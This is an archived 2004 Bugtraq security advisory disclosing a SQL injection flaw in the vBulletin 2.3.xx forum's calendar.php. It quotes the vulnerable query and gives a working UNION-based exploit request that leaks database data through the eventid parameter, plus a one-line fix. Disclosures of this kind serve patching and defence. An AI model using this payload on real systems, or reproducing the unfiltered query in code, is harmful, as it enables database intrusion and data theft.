lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY13-F394UeaCYPct10004d443@hotmail.com>
Date: Mon, 05 Jan 2004 20:32:15 +0000
From: "Qianwei Hu" <a1476854@...mail.com>
To: bugtraq@...urityfocus.com
Subject: vBulletin Forum 2.3.xx calendar.php SQL Injection


vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Website: www.safechina.net
Discovered by: mslug (a1476854@...mail.com)

Description:
=============
There exist a sql injection problem in calendar.php. Notice the eventid 
field.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT 
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events 
WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

Exploit request
================
calendar.php?s=&action=edit&eventid=14 union (SELECT 
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events 
WHERE eventid = 14) order by eventdate

(14 is the eventid of your added event)

The subject and event field will show the result.

The query_first function will only return the first row of the query result, 
so make sure it returns the
one you want.

The Fix?
============
filter eventid before query.


Disclaimer:
===========
The author is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory. Any use of the information is at the user's own risk.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ